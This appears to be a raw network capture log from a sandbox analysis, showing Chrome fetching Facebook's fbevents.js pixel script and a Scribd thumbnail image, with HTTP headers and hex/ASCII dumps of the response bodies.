                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        65192.168.2.1649799157.240.195.154436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC361OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-AkoxcMr2' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC16384INData Raw: 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1703INData Raw: 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Obje
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC14681INData Raw: 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEnc
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC16384INData Raw: 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 76 61 72 20 6a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET");f.getFbeventsModules("signalsFBEventsSendXHR");var j
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC16384INData Raw: 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 6e 75 6d 62 65 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: typeof a!=="string")throw new g();return a}}function q(){return function(a){if(typeof a!=="string"&&typeof a!=="number")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"||Array.isArray(a)||a==n


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        66192.168.2.1649802151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC411OUTGET /img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 8935
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 90
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 177856
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000149-CHI, cache-ewr-kewr1740077-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 20, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522373.361702,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 fd 4e 00 22 1e 1e f7 89 52 f7 4e 00 fd 50 00 f7 8b 56 24 1e 20 22 1e 20 fb 4e 00 ff ff ff f7 89 54 20 1e 20 f9 4e 00 fb 54 0a f5 4e 01 fd 4e 02 fd 52 06 3c 24 1c a5 3c 0c 28 20 1e ed 4c 02 3a 24 1b 24 1f 1e 26 1f 1e 34 22 1c 26 20 20 31 22 1d fb 50 00 e3 4a 03 e9 4a 02 8e 36 10 fd 54 0a 65 2e 16 9d 3a 0e 2a 20 1e 42 26 1a 71 30 14 2e 21 1d 24 20 20 db 48 05 e1 49 04 e6 4a 03 e7 4a 04 a1 3c 0e 2c 20 1e 9a 39 0e ef 4c 02 b5 40 0a a0 3a 0d fe 52 04 62 2d 16 a9 3c 0c 53 29 18 82 34 12 36 22 1c cb 44 07 6e 30 14 f1 4c 02 46 26 1a f3 4e 02 d3 46 06 fd 52
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTEN"RNPV$ " NT NTNNR<$<( L:$$&4"& 1"PJJ6Te.:* B&q0.!$ HIJJ<, 9L@:Rb-<S)46"Dn0LF&NFR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: 72 62 c6 b1 12 95 a3 75 80 9b 61 66 6b 75 7a 15 af 07 3e 8a c3 09 5a 4a 05 9d 3a 3c 33 9c e2 9d 1e f4 72 bd d3 33 5e 56 15 d4 83 38 1b d3 60 8b c1 79 30 ac c7 43 8b a6 e7 3b 15 a2 71 78 3c 0a b8 c0 9f e1 93 23 1a aa 14 54 0d cc 43 ce e9 01 63 0e 0e 7a b5 54 e0 7d 54 48 42 cd a8 79 8d 46 2d 5e a2 9f a3 9a 39 4d 1f 44 35 17 d0 19 ae 87 a0 bd 45 06 d4 51 75 ba 57 5f 44 79 19 db 5f 52 bd 70 54 ba f5 a7 32 89 7a 10 51 14 f5 34 81 1a 48 9b 68 29 51 e2 93 8a 88 f5 a8 66 7d a9 2e b7 44 07 c8 a7 42 05 3e 6a 28 54 6a 74 74 4b 0f 24 ba 02 6a ed d6 af 37 d5 e7 06 5e 2b b6 3d 42 1f 3e 2b 48 a1 68 05 cd 6e 48 94 06 d4 6a 16 d7 9d 8a 5f 89 ca cc f3 86 8d a0 ea b2 9a 41 24 18 cb 80 09 eb 55 a1 cf 18 82 ca 55 cc e4 c2 ba cf e0 0e 3b 48 46 3a 8e 8e 29 bb 7e 19 d5 76 46 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rbuafkuz>ZJ:<3r3^V8`y0C;qx<#TCczT}THByF-^9MD5EQuW_Dy_RpT2zQ4Hh)Qf}.DB>j(TjttK$j7^+=B>+HhnHj_A$UU;HF:)~vFe
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: 60 03 a1 c3 a2 9c f1 b7 3d 46 a1 e2 2f 5c a0 27 22 5b 35 ce 20 52 d9 ac aa 24 ad 85 aa 21 1d f6 3e dc 67 ea 46 fc 54 16 3b 7c e6 b2 7d f8 bd 85 35 c3 44 de fe c3 6e 2d 6d 69 c0 94 e8 5b 6b 34 c2 c6 d5 e8 d1 bd c8 ce e4 4a a0 54 86 8e 10 8b 63 95 f1 aa 08 e2 b2 19 ce 55 52 dc 43 ff 0c 5a ec a4 22 7a 9c 8d 5d 1f f0 0c 61 c9 0a ec 8a ec 2c 2d 09 23 3a 41 a7 13 12 a2 d9 7c 51 aa 67 8a 0c 09 68 fa 9e 6a 38 2a f0 b9 b4 68 af 6a 2b 4a 62 9b 62 54 d2 32 2a 13 39 58 3c 52 fb 3c 40 36 6f ea 57 86 c6 c3 4c 12 d7 42 35 0c a6 b2 94 94 b5 48 bc a1 25 cf 3f 83 07 b3 b2 b2 0e 26 49 70 2a 2e b6 87 b4 55 19 7e a2 78 df b0 89 2e ac b2 83 79 bb 91 49 85 10 7e 64 88 c5 ef 96 aa f4 42 2e ee af 7d fe 35 08 59 83 91 ec b9 6d 42 48 aa 3c 2b be 96 f0 dd ac c4 54 74 4f fb 92 35 b8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: `=F/\'"[5 R$!>gFT;|}5Dn-mi[k4JTcURCZ"z]a,-#:A|Qghj8*hj+JbbT2*9X<R<@6oWLB5H%?&Ip*.U~x.yI~dB.}5YmBH<+TtO5
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: da 10 71 06 37 83 36 9d 63 c5 10 a8 12 34 2c 5f a2 ac 5a c0 54 75 d4 e6 b4 7d 6b ab 1d 3e 52 fc b0 e2 61 85 bd c3 d1 61 3b f9 43 5b 75 c7 27 a5 c3 6d 78 29 14 ff d6 27 55 98 16 02 9c a4 10 41 56 7b c1 26 c4 bb 2e d9 0c ab ef 02 2f 8d 6a 84 da 05 9b ad 38 c7 6e 29 de 53 3d 7d 2d a7 ba ba e2 df 56 eb 9e 3d d6 1c 1b 35 a4 9f f8 a6 8a c8 03 7f 5b 9e a8 a4 6b 90 50 3d 76 53 c9 a5 53 f1 e5 74 b7 a9 bd f9 e7 89 23 f6 a6 cf 1b 5a 5a 3a 9a be 19 fe c3 d2 b7 23 c3 4f 26 5b 2a c8 ae d3 e6 7b 06 23 d0 be 4d 62 f4 20 cc 20 97 e8 8a 78 2b e9 25 d2 64 f5 a9 9d 6c 37 b5 cd 93 ed c5 96 ab ed c3 e5 7f 6a 98 b0 dd fb 78 32 a7 fc 2f 4f 0e 37 15 13 5b d6 b1 d5 0f 15 2f 24 93 dd da ae 3e 2d 6a fb 26 08 e4 8f 49 a4 fa fe 3c 79 70 ed ed fb 93 b5 f6 ab 56 c7 3d db bd f6 eb 0d c7
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: q76c4,_ZTu}k>Raa;C[u'mx)'UAV{&./j8n)S=}-V=5[kP=vSSt#ZZ:#O&[*{#Mb x+%dl7jx2/O7[/$>-j&I<ypV=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: 96 51 d1 19 c4 06 a0 8a 4e bd db 5e 69 13 54 3c 4a 23 e5 68 89 54 a8 91 6a f9 96 4b 49 07 d5 3e f4 0a 31 66 6a 00 22 90 1f 2a 64 32 bb 64 85 f0 f6 05 39 9c 2d 49 49 41 a4 21 48 a0 62 b7 ab d6 46 c5 3e f6 4e 97 41 85 0b d6 a0 48 85 12 08 54 3d 1d 3e 80 79 bc 82 2a 20 c6 c8 89 54 4c 27 e7 35 5c a2 42 78 48 cc 9a a8 f0 c7 04 ad bb b8 50 d4 68 42 de b2 a2 e5 0b 57 fd de 99 0f 54 59 9e 54 28 20 af 5e a4 42 6c 6e d1 15 4e f4 40 b4 59 0a 69 b6 9d f8 57 b3 e1 41 1a 99 5a a7 4d cd a5 f5 c7 3a e3 eb d7 c6 7f 8a 0b a7 31 38 38 f8 20 b6 ef 26 72 e7 2e a3 f1 b5 11 34 7f 87 51 a9 4d 14 96 49 3f fe b2 55 70 79 0c db f1 68 7a 18 2d 21 6d 7d d9 71 3e 2d b6 20 3a d4 95 c5 67 bd de 3e 65 84 3e 54 fa 54 27 9c 83 ed d2 b0 33 d9 e4 ba c8 fb 75 55 ef d1 a4 52 05 bc d3 3d a6 c6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: QN^iT<J#hTjKI>1fj"*d2d9-IIA!HbF>NAHT=>y* TL'5\BxHPhBWTYT( ^BlnN@YiWAZM:188 &r.4QMI?Upyhz-!m}q>- :g>e>TT'3uUR=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: e8 cb 1b 76 65 f8 8c 9d 9e 88 c7 3e e5 82 ee 90 d9 d7 33 1c 89 8c 1b 7d e6 bf d2 74 c2 eb 8b 44 a6 54 a8 7e 4b 58 05 16 86 3d 9d 6a 6f c4 e3 96 b8 3d c3 ee 06 18 9a 08 9b 01 b0 84 d5 00 a0 a4 d1 75 8f 56 4d ed fb 75 2a 16 90 4c 2b e7 d1 b7 b2 68 46 63 dd ae b9 f6 c0 dc a8 5d b3 00 ac 41 83 72 d0 f7 a3 39 a0 7c ee 36 29 02 01 7b d7 5a cc da 19 d0 aa ff fc 42 3d dd e9 eb b6 bd b6 d4 18 e9 b5 29 d3 ac 71 aa 3f 1c 7c ad b5 d4 98 ed 3a fb 6c 7b 60 8c 8f 24 e5 ef 8f 01 79 cd 94 76 26 20 8b 59 4d 86 99 98 23 e1 d6 2c 85 d7 bd b4 5f 79 8f 0e 6a 96 a2 1e ef ba 24 de af 7a 97 ac 7a ac b1 69 0a 80 7b 2d 12 90 e6 b6 35 c0 41 a5 5c e3 02 d6 79 83 d6 ea 69 a1 68 4d 0f 65 aa d1 1a 54 5d ed 7d 0a 4c a5 7c 30 33 6b 82 be 55 8a 46 54 06 44 45 a9 74 72 18 d0 d2 03 03 d1 b5
